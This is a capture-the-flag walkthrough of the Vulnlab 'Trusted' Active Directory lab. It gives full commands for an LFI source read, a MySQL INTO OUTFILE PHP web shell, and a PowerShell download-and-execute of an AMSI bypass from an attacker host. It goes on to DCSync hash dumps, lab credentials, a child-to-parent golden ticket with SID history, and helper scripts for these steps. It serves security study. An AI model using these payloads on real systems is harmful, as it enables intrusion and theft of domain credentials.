Trusted is an easy-level machine from Vulnlab. The challenge involves exploiting a web vulnerability to gain an initial foothold on the server, escalating privileges to obtain administrative access, and moving laterally to the domain controller by leveraging a parent-child domain relationship.

Enumeration
We begin by scanning the two identified IPs with nmap. Some of the captured output and commands further down come from later lab sessions with different IP ranges; map them to hosts by hostname (TRUSTEDDC / LABDC) rather than by address.
| IP | Hostname | Domain | Notes |
|---|---|---|---|
| 10.10.234.5 | trusteddc | trusted.vl | Parent Domain |
| 10.10.234.6 | labdc | lab.trusted.vl | Child Domain |
Scanning 10.10.234.5
sudo nmap -sC -sV -oA 10.10.234.5 10.10.234.5
The scan identifies this machine as the domain controller TRUSTEDDC for trusted.vl: DNS, LDAP (389/636 and the global catalog on 3268/3269), SMB, RPC, RDP and WinRM are open, and rdp-ntlm-info reports the hostname trusteddc.trusted.vl.
Scanning 10.10.234.6
sudo nmap -sC -sV -oA 10.10.234.6 10.10.234.6


The results identify this machine as the second domain controller, LABDC (labdc.lab.trusted.vl). Together the scans confirm two domains, trusted.vl and lab.trusted.vl, in a parent-child relationship (rdp-ntlm-info on LABDC reports DNS_Tree_Name trusted.vl). Unlike TRUSTEDDC, LABDC also exposes Apache/XAMPP with PHP 8.1.6 on ports 80 and 443 and MySQL (MariaDB) on 3306, so that is where we look for a foothold.
Web Enumeration
Since port 80 is open on LABDC, we enumerate the web server further with feroxbuster (extensions php, html and txt; 404/405/410 responses filtered out):
feroxbuster -k -u http://10.10.248.102:80 -C 404,405,410 -m GET,POST -e -x php,html,txt

Brute-forcing turns up a /dev directory whose index.html takes a view parameter that is included server-side, a local file inclusion. Wrapping the target in php://filter/convert.base64-encode returns the file's source as base64 instead of executing it, so the PHP configuration file can be read:
https://10.10.181.134/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
- base64-decode the response (e.g. in CyberChef) to recover db.php, which holds the MySQL connection settings


For reference, the full nmap output for LABDC (scanned in a session where it was 10.10.181.134):
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.181.134/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-05-01 08:02:09Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3306/tcp open mysql syn-ack MySQL 5.5.5-10.4.24-
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-05-01T08:03:06+00:00
|_ssl-date: 2024-05-01T08:03:13+00:00; +6s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
The full nmap output for TRUSTEDDC (10.10.181.133 in the same session):
Nmap scan report for 10.10.181.133
Host is up, received user-set (0.10s latency).
Scanned at 2024-05-01 04:03:11 EDT for 69s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal
| rdp-ntlm-info:
| Target_Name: TRUSTED
| NetBIOS_Domain_Name: TRUSTED
| NetBIOS_Computer_Name: TRUSTEDDC
| DNS_Domain_Name: trusted.vl
| DNS_Computer_Name: trusteddc.trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-05-01T08:04:15+00:00
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
Credentials for lab\rsmith (IHateEric2) are valid against the child domain: Impacket's addcomputer.py succeeds, which requires working domain credentials and a non-zero MachineAccountQuota (the default is 10).
user@parrot:~/vulnlab/trusted % addcomputer.py -dc-ip 10.10.136.230 lab.trusted.vl/rsmith:IHateEric2
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account DESKTOP-H2BL6QM4$ with password NsgCSArVrMNabsdxw7cBpDuDK9DxsA6I.
The payload we later pass to the web shell fetches an AMSI bypass from the attacker host (10.8.2.41) and runs it in memory, so follow-on PowerShell tooling is not blocked:
(New-Object System.Net.WebClient).DownloadString("http://10.8.2.41/amsi64.txt") | IEX
Webshell
Port 3306 is open and db.php gave us the MySQL root credentials. The phpinfo page confirms the document root is C:\xampp\htdocs, so with the FILE privilege that root holds we can write a PHP web shell into the /dev directory with SELECT ... INTO OUTFILE and get code execution. This works because XAMPP's MariaDB leaves secure_file_priv unset; on a hardened server the write would be refused.
select '<?php echo "command: " . system($_REQUEST["cmd"]); ?>' into outfile "C:\\xampp\\htdocs\\dev\\shell.php";
Requesting shell.php with a cmd parameter runs the command under the web server's account; we use it to pull and execute the AMSI bypass:
cmd=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.41/amsi64.txt');
NT hashes collected so far:
| username | hash |
|---|---|
| TRUSTEDDC$ | |
| cpowers | 322db798a55f85f09b3d61b976a13c43 |
| LABDC$ | b24ebda0603c6eb41852654caf59cdee |
| LABDC$ | c09bb2eac3477dd3821d956ba314c3af |
LABDC$ is the child DC's machine account and therefore holds directory replication rights, so its NT hash alone lets us DCSync the whole child domain with secretsdump.py (the LM half of -hashes can be left empty):
secretsdump.py 'LABDC$'@10.10.244.198 -hashes :c09bb2eac3477dd3821d956ba314c3af
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:c09bb2eac3477dd3821d956ba314c3af:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:eb35214e0dee200982af13a2239b9300:::
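To keep track of what a dump like this unlocks, here is a small triage script. It is an added example, not part of the original write-up or of Impacket: it parses secretsdump.py's user:rid:lmhash:nthash::: lines (the sample text is the child-domain dump above, embedded as constructed input), separates the krbtgt key, trust accounts, machine accounts and ordinary users, and flags any entry whose LM hash is not the empty-string value. The set of domain NetBIOS names used to recognise trust accounts is supplied by you from enumeration (here TRUSTED, from the rdp-ntlm-info output), since the dump alone cannot tell a trust account from a computer.

```python
"""Triage of a secretsdump.py NTDS dump.

Added example, not part of the original write-up or of Impacket. It reads the
user:rid:lmhash:nthash::: lines, then sorts accounts by what their hash
unlocks for the next hop.
"""
import re

# Constructed sample input: the child-domain dump lines shown above.
SECRETSDUMP_OUTPUT = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:c09bb2eac3477dd3821d956ba314c3af:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:eb35214e0dee200982af13a2239b9300:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string: LM storage is off
RID_KRBTGT = 502

# domain\user is optional (secretsdump prints it only for some entries).
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::"
)


def parse_secretsdump(text):
    """One dict per credential line; status lines and blanks are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["rid"] = int(e["rid"])
            entries.append(e)
    return entries


def triage(entries, trust_domain_netbios_names):
    """Group entries by what they unlock.

    krbtgt           -> golden tickets for this domain
    trust_accounts   -> <NETBIOS>$ accounts named after a trusting domain; their
                        NT hash is the inter-realm trust key (the name set comes
                        from enumeration, not from the dump)
    machine_accounts -> every other account ending in $
    users            -> everything else
    lm_present       -> entries whose LM hash is not the empty-string value
    """
    names = {n.upper().rstrip("$") for n in trust_domain_netbios_names}
    out = {"krbtgt": None, "trust_accounts": [], "machine_accounts": [],
           "users": [], "lm_present": []}
    for e in entries:
        if e["lm"] != EMPTY_LM:
            out["lm_present"].append(e)
        user = e["user"]
        if e["rid"] == RID_KRBTGT:
            out["krbtgt"] = e
        elif user.endswith("$") and user[:-1].upper() in names:
            out["trust_accounts"].append(e)
        elif user.endswith("$"):
            out["machine_accounts"].append(e)
        else:
            out["users"].append(e)
    return out


def impacket_hashes_arg(entry):
    """Value for Impacket's -hashes flag; the LM half is unused and can be empty."""
    return ":" + entry["nt"]


if __name__ == "__main__":
    t = triage(parse_secretsdump(SECRETSDUMP_OUTPUT), {"TRUSTED"})
    print("krbtgt NT hash  :", t["krbtgt"]["nt"])
    print("trust accounts  :", [e["user"] for e in t["trust_accounts"]])
    print("machine accounts:", [e["user"] for e in t["machine_accounts"]])
    print("users           :", [e["user"] for e in t["users"]])
```

Run it as a script to see the groups for the dump above; in practice you would feed it the saved secretsdump output and the NetBIOS names of every trusting domain you have seen.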
With the child domain dumped, we turn to the parent. SharpView's Get-ForestDomain lists the domains in the forest, and lookupsid.py (authenticating as cpowers with the NT hash) gives us the child domain's SID, which the forged ticket needs:
sharpview Get-ForestDomain
lookupsid.py lab.trusted.vl/cpowers@10.10.244.198 -hashes aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Brute forcing SIDs at 10.10.244.198
[*] StringBinding ncacn_np:10.10.244.198[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2241985869-2159962460-1278545866
500: LAB\Administrator (SidTypeUser)
501: LAB\Guest (SidTypeUser)
502: LAB\krbtgt (SidTypeUser)
512: LAB\Domain Admins (SidTypeGroup)
513: LAB\Domain Users (SidTypeGroup)
514: LAB\Domain Guests (SidTypeGroup)
515: LAB\Domain Computers (SidTypeGroup)
516: LAB\Domain Controllers (SidTypeGroup)
517: LAB\Cert Publishers (SidTypeAlias)
520: LAB\Group Policy Creator Owners (SidTypeGroup)
521: LAB\Read-only Domain Controllers (SidTypeGroup)
522: LAB\Cloneable Domain Controllers (SidTypeGroup)
525: LAB\Protected Users (SidTypeGroup)
526: LAB\Key Admins (SidTypeGroup)
553: LAB\RAS and IAS Servers (SidTypeAlias)
571: LAB\Allowed RODC Password Replication Group (SidTypeAlias)
572: LAB\Denied RODC Password Replication Group (SidTypeAlias)
1000: LAB\LABDC$ (SidTypeUser)
1101: LAB\DnsAdmins (SidTypeAlias)
1102: LAB\DnsUpdateProxy (SidTypeGroup)
1103: LAB\TRUSTED$ (SidTypeUser)
1104: LAB\rsmith (SidTypeUser)
1106: LAB\ewalters (SidTypeUser)
1107: LAB\cpowers (SidTypeUser)
TRUSTED$ (RID 1103) in the listing above is not a computer but the trust account for trusted.vl; its NT hash from the dump is the inter-realm trust key and could be used to forge a referral ticket instead, but the krbtgt hash is the simpler route here. We still need the parent domain's SID. Querying Enterprise Admins in trusted.vl gives it (the group's RID is 519, so the full group SID is this domain SID with -519 appended):
sharpview Get-NetGroup -GroupName "Enterprise Admins" -Domain "trusted.vl"
S-1-5-21-3576695518-347000760-3731839591
Now we forge a golden ticket for lab.trusted.vl with the child krbtgt hash and add the parent's Enterprise Admins SID as SID history (-extra-sid). The parent DC honours it because SID filtering is not applied to parent-child trusts within a forest, which is why the forest, not the domain, is the security boundary:
ticketer.py -nthash c7a03c565c68c6fac5f8913fab576ebd -domain lab.trusted.vl -domain-sid S-1-5-21-2241985869-2159962460-1278545866 -extra-sid S-1-5-21-3576695518-347000760-3731839591-519 Administrator
ticketer.py writes Administrator.ccache; with KRB5CCNAME pointing at it we DCSync the parent domain controller over Kerberos, which dumps trusted.vl including its Administrator hash and completes the compromise:
secretsdump.py lab.trusted.vl/Administrator@TRUSTEDDC.trusted.vl -k -no-pass -target-ip 10.10.244.197
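The SID handling behind the lookupsid.py, Get-NetGroup and ticketer.py steps above, as an added example that is not part of the original write-up or of Impacket: it extracts the child domain SID from lookupsid.py output (a constructed excerpt of the listing above), builds the parent's Enterprise Admins SID from the parent domain SID, refuses an extra SID that belongs to the ticket's own domain (which would not be SID history at all), and converts SIDs to and from the binary form stored in objectSid and in the PAC. Nothing here talks to a DC; the well-known RIDs and the binary SID layout are standard Windows definitions.

```python
"""SID arithmetic for a child-to-parent golden ticket.

Added example, not part of the original write-up or of Impacket.
"""
import re
import struct

# Constructed sample input: an excerpt of the lookupsid.py output above.
LOOKUPSID_OUTPUT = """\
[*] Brute forcing SIDs at 10.10.244.198
[*] StringBinding ncacn_np:10.10.244.198[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-2241985869-2159962460-1278545866
500: LAB\\Administrator (SidTypeUser)
512: LAB\\Domain Admins (SidTypeGroup)
1103: LAB\\TRUSTED$ (SidTypeUser)
"""

# Well-known RIDs. Enterprise Admins (519) exists only in the forest root domain.
RID_ADMINISTRATOR = 500
RID_DOMAIN_ADMINS = 512
RID_ENTERPRISE_ADMINS = 519

SID_RE = re.compile(r"^S-1-(\d+)((?:-\d+)+)$")


def parse_sid(sid):
    """Split 'S-1-<authority>-<sub>-...' into (authority, [sub-authorities])."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a SID: {sid!r}")
    authority = int(m.group(1))
    subs = [int(x) for x in m.group(2).split("-")[1:]]
    if len(subs) > 15:
        raise ValueError("a SID carries at most 15 sub-authorities")
    return authority, subs


def sid_to_bytes(sid):
    """Binary SID as stored in objectSid and in PAC SID arrays:
    revision(1) | sub-authority count(1) | authority(6, big-endian) | subs(4 each, little-endian)."""
    authority, subs = parse_sid(sid)
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(raw):
    """Inverse of sid_to_bytes, with a length/revision sanity check."""
    if len(raw) < 8 or raw[0] != 1 or len(raw) != 8 + 4 * raw[1]:
        raise ValueError("malformed binary SID")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % raw[1], raw[8:])
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def domain_sid_from_lookupsid(output):
    """Pull the domain SID that lookupsid.py prints before the RID listing."""
    for line in output.splitlines():
        if line.startswith("[*] Domain SID is: "):
            sid = line.split(": ", 1)[1].strip()
            parse_sid(sid)  # validate before returning
            return sid
    raise ValueError("no domain SID in lookupsid output")


def domain_part(sid):
    """Drop the trailing RID; what remains identifies the issuing domain."""
    authority, subs = parse_sid(sid)
    if len(subs) < 2:
        raise ValueError("SID has no RID to strip")
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs[:-1]))


def extra_sid_for_parent(child_domain_sid, parent_domain_sid, rid=RID_ENTERPRISE_ADMINS):
    """SID-history entry for a child-to-parent golden ticket.

    The forged TGT is signed with the child's krbtgt key, so every SID it
    carries natively is a child-domain SID. The extra SID must come from a
    different domain to count as SID history, and RID 519 is only meaningful
    in the forest root domain.
    """
    parse_sid(child_domain_sid)
    parse_sid(parent_domain_sid)
    if child_domain_sid == parent_domain_sid:
        raise ValueError("extra SID must belong to a different domain than the ticket")
    return f"{parent_domain_sid}-{rid}"


if __name__ == "__main__":
    child = domain_sid_from_lookupsid(LOOKUPSID_OUTPUT)
    parent = "S-1-5-21-3576695518-347000760-3731839591"  # from Get-NetGroup above
    extra = extra_sid_for_parent(child, parent)
    print("ticket domain SID :", child)
    print("-extra-sid        :", extra)
    print("extra SID (hex)   :", sid_to_bytes(extra).hex())
```

The printed -extra-sid value is exactly the one passed to ticketer.py above; the binary form is what a DC compares when it evaluates SID history, which is why a SID from the ticket's own domain would be pointless and is rejected here.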